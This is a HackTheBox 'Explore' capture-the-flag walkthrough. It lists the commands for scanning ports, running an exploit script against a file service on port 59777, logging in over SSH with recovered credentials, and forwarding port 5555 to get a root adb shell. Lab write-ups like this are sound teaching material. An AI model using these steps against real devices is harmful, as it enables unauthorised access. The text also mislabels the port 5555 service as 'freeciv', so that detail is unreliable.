HackTheBox : Explore Walkthrough

First glance

Now let’s get acquainted with our site.

The site is not opening. Ok then let’s do a port scan

Step 1.

Command: nmap -p- -T4 10.10.10.247

Now let’s take a closer look at the open ports.

Command: nmap -sC -sV -p 2222,5555,36145,42135,59777 10.10.10.247

Step 2.

We see something different here, let’s investigate immediately and find the appropriate exploit.

I looked at the first site and found the appropriate exploit.

As you can see, it is running on port 59777. When we look at the files here, we see the contents. I know where the file is because I already solved it. But you can have a look if you want.

Let ‘s do it.

Step 3.

Command: python3 50070.py listPics 10.10.10.247

Now let’s download the photo we need and see.

Command: python3 50070.py getFile 10.10.10.247 *******************

Bingo. We found the username and password from the photo.

Step 4.

Now let’s connect with an open ssh port.

Command: ssh *****@10.10.10.247 -p 2222

Check the files, find user.txt and look inside

Findout the user flag and submit to htb.

Get root

We saw freeciv at port 5555. If you want to know more, you can do this by searching the Internet. Let’s use it

Download the adb tool first

Command: apt-get install adb

send a port connection to ssh.

Command: ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222

İs now ready to connect. Let’s start

Command: adb connect localhost:5555

Check the devices

Command: adb devices

Enter Shell

Command: adb -s localhost:5555 shell

And it’s ready. We have gained root power. Find the root.txt and send the root flag.

Get Roota and find the flag.

Findout the root flag and submit to htb.

Good h4cks)